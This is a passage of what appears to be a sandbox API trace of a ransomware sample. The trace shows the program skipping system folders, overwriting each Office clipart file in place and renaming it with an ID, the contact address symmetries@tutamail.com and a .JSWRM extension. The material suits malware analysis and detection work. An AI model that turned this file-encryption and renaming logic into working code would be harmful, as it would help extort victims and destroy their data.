lstrcmpiW (lpString1="J0228959.WMF", lpString2="recovery") returned -1 [0088.172] lstrcmpiW (lpString1="J0228959.WMF", lpString2="perflogs") returned -1 [0088.172] lstrcmpiW (lpString1="J0228959.WMF", lpString2="documents and settings") returned 1 [0088.172] lstrcmpiW (lpString1="J0228959.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.172] lstrcmpiW (lpString1="J0228959.WMF", lpString2="system volume information") returned -1 [0088.172] lstrcmpiW (lpString1="J0228959.WMF", lpString2="msocache") returned -1 [0088.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0088.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228959.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228959.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0228959.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0088.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228959.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0228959.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0228959.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.173] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37260) returned 1 [0088.173] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9180) returned 0x24d210 [0088.173] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9180, lpOverlapped=0x0) returned 1 [0088.177] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.177] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9180, lpOverlapped=0x0) returned 1 [0088.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.178] CloseHandle (hObject=0x314) returned 1 [0088.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0088.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0088.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0088.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0088.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0088.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0088.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.180] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1daa, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0230553.WMF", cAlternateFileName="")) returned 1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2=".") returned 1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="..") returned 1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="...") returned 1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="windows") returned -1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="recovery") returned -1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="perflogs") returned -1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="documents and settings") returned 1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="system volume information") returned -1 [0088.180] lstrcmpiW (lpString1="J0230553.WMF", lpString2="msocache") returned -1 [0088.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230553.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230553.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0230553.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0088.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230553.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230553.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0230553.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0088.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0088.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0088.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.181] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7594) returned 1 [0088.181] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1da0) returned 0x205850 [0088.181] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1da0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1da0, lpOverlapped=0x0) returned 1 [0088.183] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.183] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1da0, lpOverlapped=0x0) returned 1 [0088.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.183] CloseHandle (hObject=0x314) returned 1 [0088.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0088.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0088.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0088.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0088.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0088.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.183] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230553.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230553.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0088.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0088.184] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec9380a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1066, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0230558.WMF", cAlternateFileName="")) returned 1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2=".") returned 1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="..") returned 1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="...") returned 1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="windows") returned -1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="recovery") returned -1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="perflogs") returned -1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="documents and settings") returned 1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="system volume information") returned -1 [0088.184] lstrcmpiW (lpString1="J0230558.WMF", lpString2="msocache") returned -1 [0088.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230558.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230558.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0230558.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0088.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230558.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.184] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0230558.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0230558.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0088.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0088.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0088.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.185] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4198) returned 1 [0088.186] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1060) returned 0x23fc98 [0088.186] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1060, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1060, lpOverlapped=0x0) returned 1 [0088.187] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.187] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1060, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1060, lpOverlapped=0x0) returned 1 [0088.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0088.188] CloseHandle (hObject=0x314) returned 1 [0088.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0088.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0088.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0088.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0088.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0088.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0088.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0088.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0088.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0230558.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0230558.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0088.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0088.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0088.189] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec9380a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec9380a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x332a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0232171.WMF", cAlternateFileName="")) returned 1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2=".") returned 1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="..") returned 1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="...") returned 1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="windows") returned -1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="recovery") returned -1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="perflogs") returned -1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="documents and settings") returned 1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="system volume information") returned -1 [0088.189] lstrcmpiW (lpString1="J0232171.WMF", lpString2="msocache") returned -1 [0088.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0088.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232171.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232171.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232171.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0088.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232171.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232171.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232171.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.189] WideCharToMultiByte (in: 